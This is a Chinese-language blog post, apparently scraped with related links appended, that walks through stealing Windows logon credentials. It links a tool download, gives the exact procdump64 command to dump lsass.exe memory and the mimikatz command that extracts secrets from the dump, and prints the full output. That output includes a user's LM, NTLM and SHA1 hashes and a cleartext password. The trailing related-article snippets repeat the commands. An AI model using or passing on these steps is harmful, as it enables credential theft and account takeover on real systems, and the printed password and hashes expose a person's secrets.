使用procdump64+mimikatz可实现从内存中获取明文密码

工具

  1. 链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38

首先得先获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到, 比如这样

1.导出lsass.exe

  1. procdump64.exe -accepteula -ma lsass.exe lsass.dmp

(注:必须使用管理员权限)

  1. ProcDump v8.0 - Writes process dump files
  2. Copyright (C) 2009-2016 Mark Russinovich
  3. Sysinternals - www.sysinternals.com
  4. With contributions from Andrew Richards
  5.  
  6. [15:33:26] Dump 1 initiated: C:\Users\chenglee\Desktop\Procdump\lsass.dmp
  7. [15:33:28] Dump 1 writing: Estimated dump file size is 34 MB.
  8. [15:33:28] Dump 1 complete: 34 MB written in 1.4 seconds
  9. [15:33:28] Dump count reached.

2.执行mimikatz

  1. mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

(注:必须使用管理员权限)

  1. ECHO 处于打开状态。
  2.  
  3. .#####. mimikatz 2.1.1 (x64) built on Jun 16 2018 18:49:05 - lil!
  4. .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
  5. ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
  6. ## \ / ## > http://blog.gentilkiwi.com/mimikatz
  7. '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
  8. '#####' > http://pingcastle.com / http://mysmartlogon.com ***/
  9.  
  10. mimikatz(commandline) # sekurlsa::minidump lsass.dmp
  11. Switch to MINIDUMP : 'lsass.dmp'
  12.  
  13. mimikatz(commandline) # sekurlsa::logonPasswords full
  14. Opening : 'lsass.dmp' file for minidump...
  15.  
  16. Authentication Id : 0 ; 137859 (00000000:00021a83)
  17. Session : Interactive from 1
  18. User Name : chenglee
  19. Domain : chenglee-PC
  20. Logon Server : CHENGLEE-PC
  21. Logon Time : 2018/7/25 15:06:35
  22. SID : S-1-5-21-452281122-3045282507-3243563612-1000
  23. msv :
  24. [00000003] Primary
  25. * Username : chenglee
  26. * Domain : chenglee-PC
  27. * LM : 9cffd5e7eefa14babacbf0b4adf55fde
  28. * NTLM : 8d0f8e1a18236379538411a9056799f5
  29. * SHA1 : 989281f47698b73e026160e842d86bc64c9e3c20
  30. tspkg :
  31. * Username : chenglee
  32. * Domain : chenglee-PC
  33. * Password : lizhenghua
  34. wdigest :
  35. * Username : chenglee
  36. * Domain : chenglee-PC
  37. * Password : lizhenghua
  38. kerberos :
  39. * Username : chenglee
  40. * Domain : chenglee-PC
  41. * Password : lizhenghua
  42. ssp :
  43. credman :
  44.  
  45. Authentication Id : 0 ; 137821 (00000000:00021a5d)
  46. Session : Interactive from 1
  47. User Name : chenglee
  48. Domain : chenglee-PC
  49. Logon Server : CHENGLEE-PC
  50. Logon Time : 2018/7/25 15:06:35
  51. SID : S-1-5-21-452281122-3045282507-3243563612-1000
  52. msv :
  53. [00000003] Primary
  54. * Username : chenglee
  55. * Domain : chenglee-PC
  56. * LM : 9cffd5e7eefa14babacbf0b4adf55fde
  57. * NTLM : 8d0f8e1a18236379538411a9056799f5
  58. * SHA1 : 989281f47698b73e026160e842d86bc64c9e3c20
  59. tspkg :
  60. * Username : chenglee
  61. * Domain : chenglee-PC
  62. * Password : lizhenghua
  63. wdigest :
  64. * Username : chenglee
  65. * Domain : chenglee-PC
  66. * Password : lizhenghua
  67. kerberos :
  68. * Username : chenglee
  69. * Domain : chenglee-PC
  70. * Password : lizhenghua
  71. ssp :
  72. credman :
  73.  
  74. Authentication Id : 0 ; 997 (00000000:000003e5)
  75. Session : Service from 0
  76. User Name : LOCAL SERVICE
  77. Domain : NT AUTHORITY
  78. Logon Server : (null)
  79. Logon Time : 2018/7/25 15:06:15
  80. SID : S-1-5-19
  81. msv :
  82. tspkg :
  83. wdigest :
  84. * Username : (null)
  85. * Domain : (null)
  86. * Password : (null)
  87. kerberos :
  88. * Username : (null)
  89. * Domain : (null)
  90. * Password : (null)
  91. ssp :
  92. credman :
  93.  
  94. Authentication Id : 0 ; 996 (00000000:000003e4)
  95. Session : Service from 0
  96. User Name : CHENGLEE-PC$
  97. Domain : WORKGROUP
  98. Logon Server : (null)
  99. Logon Time : 2018/7/25 15:06:15
  100. SID : S-1-5-20
  101. msv :
  102. tspkg :
  103. wdigest :
  104. * Username : CHENGLEE-PC$
  105. * Domain : WORKGROUP
  106. * Password : (null)
  107. kerberos :
  108. * Username : chenglee-pc$
  109. * Domain : WORKGROUP
  110. * Password : (null)
  111. ssp :
  112. credman :
  113.  
  114. Authentication Id : 0 ; 48630 (00000000:0000bdf6)
  115. Session : UndefinedLogonType from 0
  116. User Name : (null)
  117. Domain : (null)
  118. Logon Server : (null)
  119. Logon Time : 2018/7/25 15:06:06
  120. SID :
  121. msv :
  122. tspkg :
  123. wdigest :
  124. kerberos :
  125. ssp :
  126. credman :
  127.  
  128. Authentication Id : 0 ; 999 (00000000:000003e7)
  129. Session : UndefinedLogonType from 0
  130. User Name : CHENGLEE-PC$
  131. Domain : WORKGROUP
  132. Logon Server : (null)
  133. Logon Time : 2018/7/25 15:06:05
  134. SID : S-1-5-18
  135. msv :
  136. tspkg :
  137. wdigest :
  138. * Username : CHENGLEE-PC$
  139. * Domain : WORKGROUP
  140. * Password : (null)
  141. kerberos :
  142. * Username : chenglee-pc$
  143. * Domain : WORKGROUP
  144. * Password : (null)
  145. ssp :
  146. credman :
  147.  
  148. mimikatz(commandline) # exit
  149. Bye!

看, 密码[lizhenghua]处于明文暴露状态.

如果不是使用管理员模式运行cmd会报错,

两步完成利用procdump64+mimikatz获取win用户密码的更多相关文章

  1. procdump64+mimikatz获取win用户hash密码

    1.导出lsass.exe procdump64.exe -accepteula -ma lsass.exe lsass.dmp 2.执行mimikatz mimikatz.exe "sek ...

  2. 微信公众平台开发—利用OAuth2.0获取微信用户基本信息

    在借鉴前两篇获取微信用户基本信息的基础下,本人也总结整理了一些个人笔记:如何通过OAuth2.0获取微信用户信息 1.首先在某微信平台下配置OAuth2.0授权回调页面: 2.通过appid构造url ...

  3. SpringBoot中获取微信用户信息从未如此简单!

    前言 不知道你是否参加过拼多多上邀请微信好友砍价功能,这个功能实现首先需要考虑的就是获取微信用户的信息.获取用户信息就是获取公众号下微信用户的信息,今天我就来讲讲如何从公众号下获取微信用户信息. 需要 ...

  4. 利用procdump+Mimikatz 绕过杀软获取Windows明文密码(转)

    Mimikatz现在已经内置在Metasploit’s meterpreter里面,我们可以通过meterpreter下载.但是你如果觉得还要考虑杀毒软件,绑定payload之类的东西太过复杂,我们可 ...

  5. Android 两步搞定Fragment的返回键

    Fragment可以说是在Android开发必需要使用到技术,项目中的界面基本上都是使用Fragment来实现,而Activity只是作为Fragment的载体,但有些特殊情况下Fragment也不得 ...

  6. Kubernetes 两步验证 - 使用 Serverless 实现动态准入控制

    作者:CODING - 王炜 1. 背景 如果对 Kubernetes 集群安全特别关注,那么我们可能想要实现这些需求: 如何实现 Kubernetes 集群的两步验证,除了集群凭据,还需要提供一次性 ...

  7. 七牛云如何绑定二次验证码_虚拟MFA_两步验证_谷歌身份验证器?

    一般情况下,点账户名——账户设置——安全设置,即可开通两步验证 具体步骤见链接  七牛云如何绑定二次验证码_虚拟MFA_两步验证_谷歌身份验证器?   二次验证码小程序(官网)对比谷歌身份验证器APP ...

  8. 挑子学习笔记:两步聚类算法(TwoStep Cluster Algorithm)——改进的BIRCH算法

    转载请标明出处:http://www.cnblogs.com/tiaozistudy/p/twostep_cluster_algorithm.html 两步聚类算法是在SPSS Modeler中使用的 ...

  9. 每次Xcode 升级之后 插件失效,两步解决

    以下内容来源:http://www.cocoachina.com/bbs/read.php?tid=296269 每次Xcode 升级之后 插件失效,两步解决 1.打开终端,输入以下代码获取到DVTP ...

随机推荐

  1. python string method

    嗯,学习其它语言没这样全练过,嘻嘻 //test.py 1 # -*- coding: UTF-8 -*- 2 3 str = "i am worker" 4 print str. ...

  2. (已解决) eclipse提示报错"serializing cdt project settings"解决方案

    最近在使用eclipse作为cocos2dx的交叉编译工具.但是某天突然相关工程打不开,打开eclipse直接提示 “serializing cdt project settings” has enc ...

  3. python3学习笔记之安装

    一.Python安装 1.下载地址:  https://www.python.org/downloads/release/python-365/ 2. Linux系统自带Python2.7,如需安装3 ...

  4. FileFilter文件过滤器

    引入:将E:\java目录下的所有.java文件复制到E:\jad目录下,并将原来的文件的扩展名从.java改为.jad package com_2; import java.io.File; imp ...

  5. (转)MySql 获取所有级联父级或所有级联子级

    from:https://yq.aliyun.com/articles/48885 最近遇到了一个问题,在mysql中如何完成节点下的所有节点或节点上的所有父节点的查询?在Oracle中我们知道有一个 ...

  6. RootConfig类

    package com.ssm.yjblogs.config; import java.util.Properties; import javax.sql.DataSource; import org ...

  7. 【转】robotFramework 与testlink集成

    场景: robotframework 执行完用例之后,将执行结果报至testlink. 方案1: 通过TestLink-API-Python-client中的RF关键字 每条用例执行完成之后根据状态进 ...

  8. 【转】 如何导入excel数据到数据库,并解决导入时间格式问题

    在办公环境下,经常会用到处理excel数据,如果用写程序导入excel数据到数据库那就太麻烦了,涉及解析excel,还要各种格式问题,下面简单利用数据库本身支持的功能解决这类导入问题. 准备 创建表 ...

  9. 20155228 2017-5-10 课堂测试:MySort

    20155228 2017-5-10 课堂测试:MySort 题目和要求 模拟实现Linux下Sort-t:-k2的功能.参考Sort的实现.提交码云链接和代码运行截图. import java.ut ...

  10. wingide 远程调试

    1.首先你应该在本地安装wingide 6.1版本 2.大多数电脑.py文件都不能以wingide的形式打开(异常苦逼),无论是从“属性”或者是“设置”里面都不可以,无奈之下只能通过修改注册表的方式进 ...